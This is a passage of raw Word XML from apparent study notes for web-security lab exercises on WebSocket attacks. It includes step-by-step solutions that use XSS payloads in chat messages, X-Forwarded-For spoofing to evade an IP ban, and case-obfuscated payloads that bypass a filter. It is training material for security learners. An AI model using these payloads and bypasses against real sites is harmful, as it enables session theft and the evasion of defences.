        <w:t>gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3247D78B" wp14:editId="0924AB11">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="172334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40341" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53695A68" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00523341" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00523341">
        <w:t xml:space="preserve">Ensure that Burp Proxy is configured to intercept WebSocket messages, then send another chat message. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBE1868" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00523341" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00523341">
        <w:t xml:space="preserve">Edit the intercepted message to contain the following payload: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BB1258" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00523341" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00523341">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523341">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523341">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523341">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523341">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">=1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523341">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523341">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>='alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00523341">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>)'&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00523341">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EC36E29" wp14:editId="0A660393">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="212467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77301" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BB752A" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00523341" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00523341">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Observe that an alert is triggered in the browser. This will also happen in the support agent's browser. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8A92C4" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06A3C85E" wp14:editId="544A66D5">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="149825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53909" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="722D401E" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472"/>
    <w:p w14:paraId="4D01B3B6" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00FF0475" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF0475">
        <w:t>Manipulating the WebSocket handshake to exploit vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55582DD9" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00FF0475" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00FF0475">
        <w:t xml:space="preserve">Some </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF0475">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF0475">
        <w:t xml:space="preserve"> vulnerabilities can only be found and exploited by </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:anchor="manipulating-websocket-connections" w:history="1">
        <w:r w:rsidRPr="00FF0475">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>manipulating the WebSocket handshake</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FF0475">
        <w:t xml:space="preserve">. These vulnerabilities tend to involve design flaws, such as: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E3CAC7" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00FF0475" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0475">
        <w:t xml:space="preserve">Misplaced trust in HTTP headers to perform security decisions, such as the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0475">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>X-Forwarded-For</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0475">
        <w:t xml:space="preserve"> header. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E7122D" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00FF0475" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0475">
        <w:t xml:space="preserve">Flaws in session handling mechanisms, since the session context in which WebSocket messages are processed is generally determined by the session context of the handshake message. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B1390B" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0475">
        <w:t xml:space="preserve">Attack surface introduced by custom HTTP headers used by the application. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E615A9" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00FF0475" w:rsidRDefault="00C80472" w:rsidP="00C80472"/>
    <w:p w14:paraId="50D9FD37" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00FF0475" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00FF0475">
        <w:t xml:space="preserve">LAB </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D3F488" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00FF0475" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00FF0475">
        <w:t xml:space="preserve">PRACTITIONER </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00FF0475">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Manipulating the WebSocket handshake to exploit vulnerabilities</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FF0475">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F58DF2C" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="002F5240" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="002F5240">
        <w:t xml:space="preserve">This online shop has a live chat feature implemented using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F5240">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F5240">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7665B0" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="002F5240" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="002F5240">
        <w:t xml:space="preserve">It has an aggressive but flawed XSS filter. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C27EE74" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="002F5240" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="002F5240">
        <w:t xml:space="preserve">To solve the lab, use a WebSocket message to trigger an </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F5240">
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F5240">
        <w:t xml:space="preserve">) popup in the support agent's browser. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F37FA0" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="002F5240" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F5240">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027412C4" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="002F5240" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002F5240">
        <w:t xml:space="preserve">If you're struggling to bypass the XSS filter, try out our </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="002F5240">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>XSS labs</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002F5240">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A00A393" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="002F5240" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002F5240">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sometimes you can bypass IP-based restrictions using HTTP headers like X-Forwarded-For. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459004FD" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472"/>
    <w:p w14:paraId="411C2C6F" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E185F3" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00246D23" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00246D23">
        <w:t xml:space="preserve">Click "Live chat" and send a chat message. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DC9D23" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00246D23" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00246D23">
        <w:t xml:space="preserve">In Burp Proxy, go to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00246D23">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00246D23">
        <w:t xml:space="preserve"> history tab, and observe that the chat message has been sent via a WebSocket message. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288503E2" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00246D23" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00246D23">
        <w:t xml:space="preserve">Right-click on the message and select "Send to Repeater". </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F2C979" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00246D23" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00246D23">
        <w:t xml:space="preserve">Edit and resend the message containing a basic XSS payload, such as: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A27EEAA" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00246D23" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00246D23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00246D23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00246D23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00246D23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00246D23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">=1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00246D23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00246D23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>='alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00246D23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>)'&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00246D23">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FBC314" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00246D23" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00246D23">
        <w:t xml:space="preserve">Observe that the attack has been blocked, and that your WebSocket connection has been terminated. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4557EB6B" wp14:editId="58EF533E">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="40354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49423" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D77AF81" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00246D23">
        <w:t xml:space="preserve">Click "Reconnect", and observe that the connection attempt fails because your IP address has been banned. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0394CE85" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00246D23" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70595686" wp14:editId="2E594D30">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="146708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88080" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC371F2" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00246D23" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00246D23">
        <w:t xml:space="preserve">Add the following header to the handshake request to spoof your IP address: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF74282" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00246D23">
        <w:t xml:space="preserve">X-Forwarded-For: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">30.34.33.944 (random </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABF36C9" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00246D23" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32F303AE" wp14:editId="2FE0EA80">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="54532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22966" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A5BAC0" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00246D23" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00246D23">
        <w:t xml:space="preserve">Click "Connect" to successfully reconnect the WebSocket. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FA29A6" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00246D23" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00246D23">
        <w:t xml:space="preserve">Send a WebSocket message containing an obfuscated XSS payload, such as: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1C8D3D" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00246D23" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00246D23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00246D23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00246D23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00246D23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00246D23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">=1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00246D23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>oNeRrOr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00246D23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00246D23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>alert`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00246D23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>`&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00246D23">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D809F7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D809F7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D809F7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D809F7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D809F7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00246D23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D809F7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>jAvAsCrIpT:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D809F7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">` </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D809F7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00246D23">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>`&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E631F05" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
